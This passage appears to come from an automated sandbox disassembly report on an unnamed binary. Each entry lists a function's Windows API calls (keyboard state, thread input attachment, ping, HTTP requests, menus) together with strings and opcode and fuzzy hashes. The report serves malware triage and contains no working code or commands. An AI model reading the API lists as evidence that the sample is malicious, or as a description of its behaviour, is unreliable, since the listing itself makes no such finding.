                                                                                                                                                        • Instruction ID: 89e1a5289ca5bc7aab68ea743458d9590e850fb7731a013be5e3c3410f16893f
                                                                                                                                                        • Opcode Fuzzy Hash: 0bd2634d20cbe216c568df56b4f9526b55fb8a77f28eb727e6861d91c415e63b
                                                                                                                                                        • Instruction Fuzzy Hash: 6A41FCB290416CAADF25EB50CD55EDE73BCAB08310F5041E7F519A2152EB71ABD4CFA0
                                                                                                                                                        APIs
                                                                                                                                                        • __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                        • __itow.LIBCMT ref: 00A98519
                                                                                                                                                          • Part of subcall function 00AB2177: _xtow@16.LIBCMT ref: 00AB2198
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __itow__swprintf_xtow@16
                                                                                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                                                                                        • API String ID: 1502193981-2263619337
                                                                                                                                                        • Opcode ID: 28df67323ad746c76855c05585069e58ee0642e673f9813f5c28b704f8ff8bdf
                                                                                                                                                        • Instruction ID: 796bb3d382b71750a5c6ad137088d0aa093243d3aa54504798f98f4f54d8c555
                                                                                                                                                        • Opcode Fuzzy Hash: 28df67323ad746c76855c05585069e58ee0642e673f9813f5c28b704f8ff8bdf
                                                                                                                                                        • Instruction Fuzzy Hash: 6C41DF71600605ABDF34DB38DD82FAA7BE9EF45310F2044AAE54AD7292EA35DA41CB10
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AB5CCA
                                                                                                                                                          • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00AB5D63
                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00AB5D99
                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00AB5DB6
                                                                                                                                                        • __allrem.LIBCMT ref: 00AB5E0C
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AB5E28
                                                                                                                                                        • __allrem.LIBCMT ref: 00AB5E3F
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AB5E5D
                                                                                                                                                        • __allrem.LIBCMT ref: 00AB5E74
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AB5E92
                                                                                                                                                        • __invoke_watson.LIBCMT ref: 00AB5F03
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 384356119-0
                                                                                                                                                        • Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                                                        • Instruction ID: a1602f9cdbcb11fd03974639339bb939078e6aa04981ff8923c7137fb6a0a753
                                                                                                                                                        • Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                                                        • Instruction Fuzzy Hash: A071E872E01B16ABE714EF79CD81BEA77BDAF11364F144229F510D7682E770DA408B90
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AD5816
                                                                                                                                                        • GetMenuItemInfoW.USER32(00B518F0,000000FF,00000000,00000030), ref: 00AD5877
                                                                                                                                                        • SetMenuItemInfoW.USER32(00B518F0,00000004,00000000,00000030), ref: 00AD58AD
                                                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00AD58BF
                                                                                                                                                        • GetMenuItemCount.USER32(?), ref: 00AD5903
                                                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00AD591F
                                                                                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00AD5949
                                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 00AD598E
                                                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AD59D4
                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AD59E8
                                                                                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AD5A09
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4176008265-0
                                                                                                                                                        • Opcode ID: 6d3e48a39de5806435471a9b3051c14a5ed536db9ca9a831a6697895f182dd12
                                                                                                                                                        • Instruction ID: 33a8e1c4d150121a17755e4e17e5527ed78cb17477df499fa212698cdce5c19f
                                                                                                                                                        • Opcode Fuzzy Hash: 6d3e48a39de5806435471a9b3051c14a5ed536db9ca9a831a6697895f182dd12
                                                                                                                                                        • Instruction Fuzzy Hash: 9A61AC70D00659EFDB11CFB8C998EAE7BB9EB01358F18455AE442A7351DB30AD01DB20
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00AF9AA5
                                                                                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00AF9AA8
                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AF9ACC
                                                                                                                                                        • _memset.LIBCMT ref: 00AF9ADD
                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AF9AEF
                                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00AF9B67
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$LongWindow_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 830647256-0
                                                                                                                                                        • Opcode ID: 2d7c3856aede3d36418bc1c3f1124d787553491210dfaa06488dc6af38b65727
                                                                                                                                                        • Instruction ID: 53484656457c26fc191d5c04df2eeb9a2ca965cc0abfc53b7b88b6ab0703f50b
                                                                                                                                                        • Opcode Fuzzy Hash: 2d7c3856aede3d36418bc1c3f1124d787553491210dfaa06488dc6af38b65727
                                                                                                                                                        • Instruction Fuzzy Hash: CB614975A00208AFDB21DFA8CD81FEE77F8AB09710F104599FA15E72A2D770AD46DB50
                                                                                                                                                        APIs
                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00AD3591
                                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00AD3612
                                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 00AD362D
                                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00AD3647
                                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 00AD365C
                                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00AD3674
                                                                                                                                                        • GetKeyState.USER32(00000011), ref: 00AD3686
                                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00AD369E
                                                                                                                                                        • GetKeyState.USER32(00000012), ref: 00AD36B0
                                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00AD36C8
                                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00AD36DA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                                        • Opcode ID: eb95dffd3b1d11d6cd926c5ffae6410b3a62a8b57478826a95378b0ec6e8b026
                                                                                                                                                        • Instruction ID: 764e3bd28951d172ff046c1f5162df1d5ec82a8dec5379d273004bc8465f93df
                                                                                                                                                        • Opcode Fuzzy Hash: eb95dffd3b1d11d6cd926c5ffae6410b3a62a8b57478826a95378b0ec6e8b026
                                                                                                                                                        • Instruction Fuzzy Hash: F8419F65508BC97DFF319B6498143A6BEA16B21344F48805BD5C7463C2EBA4DBC8CBA3
                                                                                                                                                        APIs
                                                                                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00ACA2AA
                                                                                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00ACA2F5
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00ACA307
                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00ACA327
                                                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00ACA36A
                                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00ACA37E
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00ACA393
                                                                                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00ACA3A0
                                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00ACA3A9
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00ACA3BB
                                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00ACA3C6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2706829360-0
                                                                                                                                                        • Opcode ID: 7cd7ec2558ae266931adb88b46bed89cf52199df78ea9dea13dfc0f3cd7af75c
                                                                                                                                                        • Instruction ID: 5b354315057889538a1dfebf72d322530e9abfa039a84683d9d7dd166f600eec
                                                                                                                                                        • Opcode Fuzzy Hash: 7cd7ec2558ae266931adb88b46bed89cf52199df78ea9dea13dfc0f3cd7af75c
                                                                                                                                                        • Instruction Fuzzy Hash: 10414D3590021DEFCB01DFA8D994EEEBBB9FF48304F518069E501A7361DB34AA45CBA1
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                          • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                                                                                                                                                        • CoInitialize.OLE32 ref: 00AEB298
                                                                                                                                                        • CoUninitialize.COMBASE ref: 00AEB2A3
                                                                                                                                                        • CoCreateInstance.COMBASE(?,00000000,00000017,00B1D8FC,?), ref: 00AEB303
                                                                                                                                                        • IIDFromString.COMBASE(?,?), ref: 00AEB376
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00AEB410
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00AEB471
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                        • API String ID: 834269672-1287834457
                                                                                                                                                        APIs
                                                                                                                                                        • WSAStartup.WS2_32(00000101,?), ref: 00AE86F5
                                                                                                                                                        • inet_addr.WS2_32(?), ref: 00AE873A
                                                                                                                                                        • gethostbyname.WS2_32(?), ref: 00AE8746
                                                                                                                                                        • IcmpCreateFile.IPHLPAPI ref: 00AE8754
                                                                                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00AE87C4
                                                                                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00AE87DA
                                                                                                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00AE884F
                                                                                                                                                        • WSACleanup.WS2_32 ref: 00AE8855
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                        • String ID: Ping
                                                                                                                                                        • API String ID: 1028309954-2246546115
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AF9C68
                                                                                                                                                        • CreateMenu.USER32 ref: 00AF9C83
                                                                                                                                                        • SetMenu.USER32(?,00000000), ref: 00AF9C92
                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AF9D1F
                                                                                                                                                        • IsMenu.USER32(?), ref: 00AF9D35
                                                                                                                                                        • CreatePopupMenu.USER32 ref: 00AF9D3F
                                                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AF9D70
                                                                                                                                                        • DrawMenuBar.USER32 ref: 00AF9D7E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 176399719-4108050209
                                                                                                                                                        APIs
                                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00ADEC1E
                                                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00ADEC94
                                                                                                                                                        • GetLastError.KERNEL32 ref: 00ADEC9E
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00ADED0B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                        • API String ID: 4194297153-14809454
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00ACC782
                                                                                                                                                        • GetDlgCtrlID.USER32 ref: 00ACC78D
                                                                                                                                                        • GetParent.USER32 ref: 00ACC7A9
                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00ACC7AC
                                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00ACC7B5
                                                                                                                                                        • GetParent.USER32(?), ref: 00ACC7D1
                                                                                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00ACC7D4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                        • API String ID: 313823418-1403004172
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00ACC869
                                                                                                                                                        • GetDlgCtrlID.USER32 ref: 00ACC874
                                                                                                                                                        • GetParent.USER32 ref: 00ACC890
                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00ACC893
                                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00ACC89C
                                                                                                                                                        • GetParent.USER32(?), ref: 00ACC8B8
                                                                                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00ACC8BB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                        APIs
                                                                                                                                                        • GetParent.USER32 ref: 00ACC8D9
                                                                                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00ACC8EE
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00ACC900
                                                                                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00ACC97B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                        APIs
                                                                                                                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00ADB137
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ArraySafeVartype
                                                                                                                                                        • String ID:
                                                                                                                                                        APIs
                                                                                                                                                        • __lock.LIBCMT ref: 00ABBA74
                                                                                                                                                          • Part of subcall function 00AB8984: __mtinitlocknum.LIBCMT ref: 00AB8996
                                                                                                                                                          • Part of subcall function 00AB8984: RtlEnterCriticalSection.NTDLL(00AB0127), ref: 00AB89AF
                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00ABBA85
                                                                                                                                                          • Part of subcall function 00AB7616: __calloc_impl.LIBCMT ref: 00AB7625
                                                                                                                                                          • Part of subcall function 00AB7616: Sleep.KERNEL32(00000000,?,00AB0127,?,00A9125D,00000058,?,?), ref: 00AB763C
                                                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00ABBAA0
                                                                                                                                                        • GetStartupInfoW.KERNEL32(?,00B46990,00000064,00AB6B14,00B467D8,00000014), ref: 00ABBAF9
                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00ABBB44
                                                                                                                                                        • GetFileType.KERNEL32(00000001), ref: 00ABBB8B
                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00ABBBC4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                                        • String ID:
                                                                                                                                                        APIs
                                                                                                                                                        • __swprintf.LIBCMT ref: 00AD7226
                                                                                                                                                        • __swprintf.LIBCMT ref: 00AD7233
                                                                                                                                                          • Part of subcall function 00AB234B: __woutput_l.LIBCMT ref: 00AB23A4
                                                                                                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00AD725D
                                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00AD7269
                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00AD7276
                                                                                                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00AD7296
                                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00AD72A8
                                                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00AD72B7
                                                                                                                                                        • LockResource.KERNEL32(?), ref: 00AD72C3
                                                                                                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00AD7322
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1433390588-0
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00AD4A7D
                                                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4A91
                                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00AD4A98
                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4AA7
                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00AD4AB9
                                                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4AD2
                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4AE4
                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4B29
                                                                                                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4B3E
                                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4B49
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2156557900-0
                                                                                                                                                        APIs
                                                                                                                                                        • GetClientRect.USER32(?), ref: 00B0EC32
                                                                                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00B0EC49
                                                                                                                                                        • GetWindowDC.USER32(?), ref: 00B0EC55
                                                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00B0EC64
                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00B0EC76
                                                                                                                                                        • GetSysColor.USER32(00000005), ref: 00B0EC94
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 272304278-0
                                                                                                                                                        APIs
                                                                                                                                                        • EnumChildWindows.USER32(?,00ACDD46), ref: 00ACDC86
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ChildEnumWindows
                                                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                        • API String ID: 3555792229-1603158881
                                                                                                                                                        APIs
                                                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A945F0
                                                                                                                                                        • CoUninitialize.COMBASE ref: 00A94695
                                                                                                                                                        • UnregisterHotKey.USER32(?), ref: 00A947BD
                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00B05936
                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00B0599D
                                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B059CA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                        • String ID: close all
                                                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                                                        APIs
                                                                                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00AAC2D2
                                                                                                                                                          • Part of subcall function 00AAC697: GetClientRect.USER32(?,?), ref: 00AAC6C0
                                                                                                                                                          • Part of subcall function 00AAC697: GetWindowRect.USER32(?,?), ref: 00AAC701
                                                                                                                                                          • Part of subcall function 00AAC697: ScreenToClient.USER32(?,000000FF), ref: 00AAC729
                                                                                                                                                        • GetDC.USER32 ref: 00B0E006
                                                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B0E019
                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B0E027
                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B0E03C
                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00B0E044
                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B0E0CF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                        • String ID: U
                                                                                                                                                        • API String ID: 4009187628-3372436214
                                                                                                                                                        • Opcode ID: fc9ea852577eec132e3617c9d45549a6756b5a2c080ecf6e52096851e7ab79ab
                                                                                                                                                        • Instruction ID: 7e881f400028d5740e9b08c898b6fa79c205e59cd70d9eed43e0fa5bc2d97a5f
                                                                                                                                                        • Opcode Fuzzy Hash: fc9ea852577eec132e3617c9d45549a6756b5a2c080ecf6e52096851e7ab79ab
                                                                                                                                                        • Instruction Fuzzy Hash: 0371DD31400209DFCF219FA4C881AEA7FB5FF49360F148AA9ED665B2E6D731C845DB60
                                                                                                                                                        APIs
                                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00AE4C5E
                                                                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00AE4C8A
                                                                                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00AE4CCC
                                                                                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00AE4CE1
